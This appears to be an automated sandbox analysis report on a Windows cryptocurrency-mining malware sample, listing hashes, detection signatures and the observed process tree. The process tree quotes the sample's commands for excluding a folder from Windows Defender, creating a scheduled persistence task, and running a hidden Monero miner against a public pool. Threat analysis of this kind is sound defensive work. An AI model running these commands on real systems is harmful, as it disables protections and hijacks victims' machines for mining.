Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-12-2022 18:07
Static task
static1
General
-
Target
d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe
-
Size
2.6MB
-
MD5
336aa18330b97fff9c99312ad63c0464
-
SHA1
af9e917778bf2b87aabaa39a31ec6e2219928a61
-
SHA256
d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce
-
SHA512
0d8a65b027f619fe7d0fb186eb5fcf3e7b7c40e4ef1de8b29f548946e314ee2576aa37d1fa2c997fdaecc67c2e95f5c9b17fa8857f1628a32e601866e66184b8
-
SSDEEP
49152:9+91DmlwRPipQJ8c6DDi6b6Yd09C0KX8Fr9JpwI1YhwnGqsGp6Ku:9+9PSS846YC3XobQ7ou
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/2080-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2080-161-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/2080-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2080-163-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2080-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2080-166-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4812 set thread context of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4792 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4056 powershell.exe 4056 powershell.exe 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeLockMemoryPrivilege 2080 vbc.exe Token: SeLockMemoryPrivilege 2080 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2080 vbc.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4812 wrote to memory of 4056 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 79 PID 4812 wrote to memory of 4056 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 79 PID 4812 wrote to memory of 4848 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 81 PID 4812 wrote to memory of 4848 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 81 PID 4848 wrote to memory of 4792 4848 cmd.exe 83 PID 4848 wrote to memory of 4792 4848 cmd.exe 83 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84 PID 4812 wrote to memory of 2080 4812 d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe"C:\Users\Admin\AppData\Local\Temp\d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:4792
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2080
-